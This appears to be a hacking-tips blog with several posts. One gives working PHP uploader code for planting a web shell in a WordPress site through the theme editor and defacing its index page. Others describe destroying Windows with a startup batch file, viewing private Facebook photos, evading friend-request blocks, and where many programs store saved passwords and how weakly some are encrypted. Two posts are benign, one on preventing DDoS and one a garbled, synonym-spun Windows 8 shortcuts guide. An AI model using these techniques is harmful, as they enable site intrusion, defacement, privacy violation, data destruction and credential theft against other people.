Tuesday, July 15, 2014

Private FACEBOOK Profile Picture in FULL SIZE

Private Profile Picture in ACTUAL SIZE

Many individuals (specially girls) make their profile picture secure to ONLY ME privacy option, so that other ones could not able to view the profile pic. Although, the profile pic is visible on the profile but you can't open that pic to view in a full size view.. Now if you want to View a Private Profile Photo on a facebook profile in full size, then its all for you.... :D 

 


  • Go to the profile and try to open the profile picture. 

  • If you are able to open the image directly, then the image privacy is not strict and you can access the image

  • If you are not able to open the image, then just right click on it and copy the image address or select  View Image

  • Now the image will be opened in smaller size as due to the resolution check from Facebook.

  • Now check the address bar of your browser, u'll see URL something like..

  • Remove s160x160/ from the URL and press Enter for viewing the full size Private image

     

    Have a Gud Dae.!!..  :D ;)

Tuesday, March 25, 2014

Prevent A DDos Attack

3 Basic Tips to Prevent A DDoS Attack


Distributed denial-of-service (DDoS) attacks are always in top headlines worldwide, as they are plaguing websites in banks, and virtually of almost every organization having a prominent online presence. The main cause behind the proliferation of DDoS attacks is that there is a very low-cost that the attacker has to incur to put such attack in motion. Fortunately, today various prevention methods have been developed to tackle such attacks. Before delving further into understanding about the ways to prevent DDoS attack, let’s first understand what exactly a DDoS attack is!

Understanding DDOS Attack



A DDoS (distributed denial-of-service) attack is an attempt made by attackers to make computers’ resources inaccessible to its anticipated user. In order to carry out a DDOS attack the attackers never uses their own system; rather they create a network of zombie computers often called as a “Botnet” – that is a hive of computers, to incapacitate a website or a web server.



Let’s understand the basic idea! Now, the attacker notifies all the computers present on the botnet to keep in touch with a particular site or a web server, time and again. This increases traffic on the network that causes in slowing down the speed of a site for the intended users. Unfortunately, at times the traffic can be really high that could even lead to shutting a site completely.

3 Basic Tips to Prevent a DDoS Attack

There are several ways to prevent the DDOS attack; however, here in this guest post I’ll be covering three basic tips that will help you to protect your website from the DDoS attack.

1. Buy More Bandwidth.



One of the easiest methods is to ensure that you have sufficient bandwidth on your web. You’ll be able to tackle lots of low-scale DDOS attacks simply by buying more bandwidth so as to service the requests. How does it help? Well, distributed denial of service is a nothing more than a game of capacity. Let’s suppose you have 10,000 computer systems each distributing 1 Mbps directed towards your way. This means you’re getting 10 GB of data that is hitting your web server every second. Now, that’s causes a lot of traffic!

So to avoid such issue, you need to apply the same rule intended for normal redundancy. According to this technique, if you wish to have more web servers just multiply around diverse datacenters and next make use of load balancing. By spreading your traffic to various servers will help you balance the load and will most likely create large space adequate to handle the incessant increase in traffic.
However, there’s a problem with this method that is buying more bandwidth can be a costly affair. And as you’ll know that the current DDoS attacks are getting large, and can be a lot bigger exceeding your budget limit.

2. Opt for DDoS Mitigation Services.

A lot of network or Internet-service providers render DDoS mitigation capabilities. Look for an internet service provider having the largest DDoS protection and mitigation network, automated tools, and a pool of talented anti-DDoS technicians with the wherewithal to take action in real-time as per the varying DDoS attack characteristics. A viable alternative is to utilize a DDoS prevention appliance, which is specifically intended to discover and prevent distributed denial-of-service attacks.

3. Restricted Connectivity.

In case you have computer systems that are connected to the web directly, a better idea is to properly install/configure your routers and firewall so as to limit the connectivity. For an instance, while receiving some data from a client machine you can only allow traffic to pass from the machine only on a few chosen ports (like HTTP, POP, SMTP etc.) via the firewall.
Wrapping Up!

Websites are largely getting attacked by hackers every second. Denial-of-service attack is insanely getting huge and is creating a lot of problems for business organizations having strong online vicinity. In this guest post you’ll not only understand what a DDoS attack actually means, but will also come to know about a few type of methods to prevent DDoS attacks. Aforementioned are three tips that I’ll recommend you to run through to at least understand where to get started towards building a resilient web network with chances of surviving a DDoS attack.

 

Best Shortcuts and Tricks for Windows 8

Shortcuts and Tricks for Windows 8


The Charms Bar: the uber-important sidebar

 If you bear in mind only one keyboard crosscut, this could be it: Win+C. This brings up the Charms panel with fast access to looking out, sharing, and settings functions. alternative ways that to talk about the Charms panel embody swiping from the proper edge to the left on the bit screen, or inform along with your mouse to the highest right or bottom right corner of the screen.

You can conjointly use these keyboard shortcuts to quickly jump to

Share: Win+H
Settings: Win+I
Devices: Win+K
The App Switcher: Switch between apps quickly, To see all of your open applications and cycle between them hit Win+Tab. This brings up the App oppressor panel on the left with thumbnails of all the open apps. (Alt+Tab conjointly still works.)

Alternatively, you'll hover your mouse over the highest left corner and press down on on the fingernail to ascertain the list of running apps. Then click the one you would like to induce to.

If you've got barely screen, you'll conjointly switch to the last-used app by swiping from left to right.

The Apps Bar: Like Right-Clicking on one thing, The Apps Bar may be a menu that opens on the lowest and typically prime of the screen to gift alternative choices, counting on what app you are victimization or if you are within the begin screen. it is the context menu similar to right-clicking.

Open it by swiping down from the highest or up from the lowest of the screen. you'll conjointly right-click anyplace along with your mouse or hit Win+Z.

Working with Apps

To remove or undo a tile from the beginning screen, either right-click to pick it, press the menu key on the keyboard, or swipe down on the tile (a bit tricky). this may talk about choices for managing the tile.

By default Windows leaves those full-screen apps open. What if you would like to shut Associate in Nursing app? The previous Alt+F4 crosscut still works. Otherwise, drag the highest of the screen (with your mouse or finger) and unleash the fingernail on the lowest.

Getting to the Desktop

The desktop you recognize and love in Windows 7 remains here, don't be concerned. to induce thereto, hit Win+D or tap/click the Desktop tile on the beginning screen.

Finding What you wish

In most cases, you'll merely begin typewriting anyplace (in Associate in Nursing app, the beginning screen, windows store, etc.) and therefore the search panel can open.

Special shortcuts for looking out include: Win+Q for settings and Win+F for files.

Multi-Tasking

You can snap the ordinarily full-screen apps to the left or right aspect whereas operating within the desktop. (This solely works on screens with a minimum of 1366x768 resolution.) Try to do so: Swipe in from the left fringe of the screen or move your mouse indicator to the highest left corner and swipe all the way down to show the thumbnails of your open apps. choose one and drag its fingernail to the proper till you see a dark gray snap bar on either the left or right aspect. Then unleash the fingernail there to snap the app.

For external monitor and projector choices, hit Win+P or on the Charms panel, choose Devices, then Second Screen.

Printing and Taking Screenshots

To print from a tube app, open the Charms panel (Win+C, hover your mouse on a right corner, or swipe in from the right). Then choose the Devices charm and choose your printer. For a lot of print choices, click the a lot of settings link.

Windows 8 comes with a cool new screenshot shortcut: Hit Win+PrtScrn and therefore the system not solely takes the screenshot, it mechanically saves it as a PNG go into your footage folder (under a replacement Screenshots folder).

If you've got OneNote put in, Win+S enables you to drag to make a screen clipping and save to OneNote.

Changing Settings

Hit Win+I to induce to open the settings menu (or open the Charms bar and choose Settings). what is on it menu can modification counting on the app you are in or if you are on the beginning screen. The laptop settings—like a simplified version of the management panel—is beneath the "PC Settings" button.

Here's an excellent crosscut for power users: Win+X. It brings up links to the event viewer, device manager, prompt, and more. bear in mind that shortcut: Win+X

Locking up and move Down

Speaking of settings, beneath the laptop Settings screen, you'll customize the lock screen with a background image and conjointly opt for the apps that show notifications/information once the screen is secured. for instance, you'll have the Mail app show new emails or the Weather app show a forecast.

Finally, move down the Windows 8 approach needs variety of steps: Open the Charms Bar then click Settings (or hit Win+I), then the ability button, and choose if you would like to Sleep, Shut down, or Update and restart.

You could conjointly press Ctrl+Alt+Delete and hit the ability button within the bottom right. Or, better yet, add a closure button to your begin screen with a crosscut. 

Wednesday, August 28, 2013

Send Facebook Friend Requests even when you got blocked..!!!! :D


Facebook is a great social networking website through which we can stay connected with friends, relatives and other people. But Facebook does not allow to add strangers as your friends. You might have gone through a stage at least once in your Facebook account when a message appears i.e. your friend request is blocked for 1 day, 3 days, or even 30 days. You can not send friend request on Facebook to anyone whether you know him or not when you are blocked. This is because Facebook doesn’t let to send friend request to unknown people and considers it as spam and therefore temporarily disable sending friend requests when you violate its rules. This is generally done to secure privacy of people and some people by adding strangers as their friend make misuse of that thing.
However, sometimes you may even get blocked when you send friend request to known people but there are a lot of friend requesting awaiting approval pending already. I have also gone from this same stage, and feel helpless that we can’t send friend request to dear friends. So today i will tell you an easy trick with which you can send friend request even if you are blocked.

Ok lets start 

1. open this link - https://www.facebook.com/?sk=ff
2. then click on other tools
If you don’t know the easiest way to make contact file then follow these steps.
  • Open new text document (.txt) in notepad.
  • Add all the email addresses separated by a comma ( , ).
  • Now save that file with the extension .vcf
  • Now this is your contact file.
  • Now Upload this file to Facebook. and you will be prompted to send friend request.
 Click “OK”and You’re done
 Simple yet effective! Your friend request would be sent to desired people.
If you are not blocked from sending Friend Requests but still you get warnings like ‘This Friend Request Can’t Be Sent.. :D ;) 

>>$)R!113x<<

Thursday, August 15, 2013

How to Upload your shell on wordpress websites!!

How to Upload your shell on wordpress websites
 
Just follow the Steps given below:
 
 

1- Login to wordpress. 
Goto site.com http://www.site.com/wp-admin/




2- see "editor" option in "apprearance" and click on editor

3-Now see Right slider bar and click on any option like 404.php or comments.php

4- Edit that code and paste this code there

<?php echo '<b><br><br>'.php_uname().'<br></b>'; echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">'; echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>'; if( $_POST['_upl'] == "Upload" ) {  if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>credits : www.devilscafe.in</b><br><br>'; }  else { echo '<b>Upload Sucess !!!</b><br><br>'; } } ?>

You can paste your shell code too..

5-Now click on update file, and see theme name.
Now Goto http://www.site.com/wp-content/themes/themename/yourshellfile.php 

You will get nw a upload option there, select your shell and upload it and
to vew it goto same directory ..

example: http://www.site.com/wp-content/themes/themename/yourshell.php

Now change index.php in public_html for using shell :D
:D



HACKEDOFF!!!

Sunday, August 11, 2013

Destroying Windows



 WINDESTROYY..
 

Here, its a simple code for destroying any WINDOWS.. 

You can simply do it by deleting the NTLDR file from your system.. Bt its nt so easy to do so.. 

Herez the code to be written in batch file.. and put it in the startup folder. 
So the next you'll switch the windows, it'll be destroyed.. 


Wednesday, May 1, 2013

All Saved Password Location

All Saved Password Location





Google Chrome:

Chrome Passwords are stored in a SQLite file the sites name and sites username is in clear text but the password is seeded in a Triple DES algorithm. The file is called Web Data and is stored in the following location


XP – C:\Documents and Settings\Username\Local Settings\Application Data\Google\Chrome\User Data\Default

Vista – C:\Users\Username\Appdata\Local\Google\Chrome\User Data\Default


Trillian:

Note- I have just realised the new version of trillian the passwords made be stored/encrypted differently.

Trillian Passwords are stored in .ini files the first character of the password is encrypted with XOR with the key 243 then the password is converted into hex. The file is based on what the password is for so if it was icq it would be icq.ini (for new versions I think they are all stored in a file called accounts.ini or something similar if you open it up with notepad you will see all the data + the encrypted password). The files are stored in the following location:

XP (old version) – C:\Program Files\Trillian\users\

XP (new version) – C:\Documents and Settings\Username\Local Settings\Application Data\Trillian\user\global – I am not sure on exact but it is somewhere there.

Vista (old version)- C:\Program Files\Trillian\users\

Vista (new version)- C:\Users\Username\Appdata\Roaming\Trillian\user\gl obal



MSN /Windows Live Messenger:

MSN Messenger version 7.x: The passwords are stored under HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\C reds\[AccountName]

Windows Live Messenger version 8.x/9.x: The passwords are stored in the Credentials file, with entry name begins with “WindowsLive:name=”. They a set of Win API functions (Credential API’s) to store its’ security data (Credentials). These functions store user information, such as names and passwords for the accounts (Windows Live ID credentials). Windows Live ID Credential records are controlled by the operating system for each user and for each session. They are attached to the “target name” and “type”. If you are familiar with SQL you can think of target name and type as the primary key. Table below lists most frequently used fields in Windows Live ID Credential records.



Paltalk:

Paltalk Passwords are using the same password encryption algorithm. Paltalk passwords are stored in the registry. To encrypt the new password Paltalk looks at the serial number of the disk C:\ and performs a mix with the Nickname. The resulting string is then mixed again with the password and some other constants. The final string is then encoded and written to the registry.

AIM, ICQ and Yahoo Messenger passwords that are stored by Paltalk are encoded by BASE64 algorithm.

The passwords are stored in the Registry, under HKEY_CURRENT_USER\Software\Paltalk\[Account Name]



Google Talk:

Google Talk passwords are encoded/decoded using Crypto API. Encrypted Gmail passwords are stored by Google Talk in the registry under HKEY_CURRENT_USER\Software\Google\Google
Talk\Accounts\[Account Name]



Firefox:

The passwords are stored in one of the following filenames: signons.txt, signons2.txt, and signons3.txt (depends on Firefox version)
These password files are located inside the profile folder of Firefox, in [Windows Profile]\Application Data\Mozilla\Firefox\Profiles\[Profile Name]
Also, key3.db, located in the same folder, is used for encryption/decription of the passwords.



Yahoo Messenger 6.x:

The password is stored in the Registry, under HKEY_CURRENT_USER\Software\Yahoo\Pager
(”EOptions string” value)



Yahoo Messenger 7.5 or later:

The password is stored in the Registry, under HKEY_CURRENT_USER\Software\Yahoo\Pager – “ETS” value.
The value stored in “ETS” value cannot be recovered back to the original password.



AIM:

AIM uses Blowfish and base64 algorithms to encrypt the AIM passwords.
448-bit keyword is used to encrypt the password with Blowfish. The encrypted string is then encoded using base64. The passwords are stored in the Registry, under HKEY_CURRENT_USER\Software\America Online\AIM6\Passwords



Filezilla:

Passwords are stored in a .xml file located in Filezilla on appdata their is sources for this



Internet Explorer 4.00 – 6.00:

The passwords are stored in a secret location in the Registry known as the “Protected Storage”.
The base key of the Protected Storage is located under the following key:
“HKEY_CURRENT_USER\Software\Microsoft\Protected Storage System Provider”.

You can browse the above key in the Registry Editor (RegEdit), but you won’t be able to watch the passwords, because they are encrypted.
Also, this key cannot easily moved from one computer to another, like you do with regular Registry keys.



Internet Explorer 7.00 – 8.00:

The new versions of Internet Explorer stores the passwords in 2 different locations.
AutoComplete passwords are stored in the Registry under HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IntelliForms\Storage2.

HTTP Authentication passwords are stored in the Credentials file under Documents and Settings\Application Data\Microsoft\Credentials , together with login passwords of LAN computers and other passwords.



Opera:

The passwords are stored in wand.dat filename, located under [Windows Profile]\Application Data\Opera\Opera\profile



Outlook Express (All Versions):

The POP3/SMTP/IMAP passwords Outlook Express are also stored in the Protected Storage, like the passwords of old versions of Internet Explorer.



Outlook 98/2000:

Old versions of Outlook stored the POP3/SMTP/IMAP passwords in the Protected Storage, like the passwords of old versions of Internet Explorer.



Outlook 2002-2008:

All new versions of Outlook store the passwords in the same Registry key of the account settings.

The accounts are stored in the Registry under HKEY_CURRENT_USER\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\[ProfileName]\9375CFF0413111d3B88A00104B2A6676\[Account Index]

If you use Outlook to connect an account on Exchange server, the password is stored in the Credentials file, together with login passwords of LAN computers.



ThunderBird:

The password file is located under [Windows Profile]\Application Data\Thunderbird\Profiles\[Profile Name]
You should search a filename with .s extension.



Digsby:

The main password of Digsby is stored in [Windows Profile]\Application Data\Digsby\digsby.dat
All other passwords are stored in Digsby servers.